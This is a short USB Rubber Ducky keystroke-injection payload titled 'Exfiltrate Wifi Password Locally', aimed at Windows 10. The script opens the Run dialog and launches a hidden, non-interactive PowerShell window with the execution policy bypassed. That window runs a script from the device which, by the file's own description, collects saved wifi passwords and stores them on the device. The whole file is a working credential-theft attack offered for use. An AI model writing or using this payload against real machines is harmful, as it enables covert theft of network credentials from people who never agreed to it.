REM	=============================================================================================================
REM 	Title: Exfiltrate Wifi Password Locally
REM 	Author: Mr.Cricket
REM 	Description: This Payload Exfiltrates wifi passwords and store in the UsbRubberDucky (View ss.ps1 to change the directory)
REM 	Target: Windows 10
REM 	Category: Exfiltrate
REM	==============================================================================================================
DELAY 5000
GUI r
DELAY 200
STRING powershell -w h -NoP -NonI -ep Bypass D:\ss.ps1
ENTER
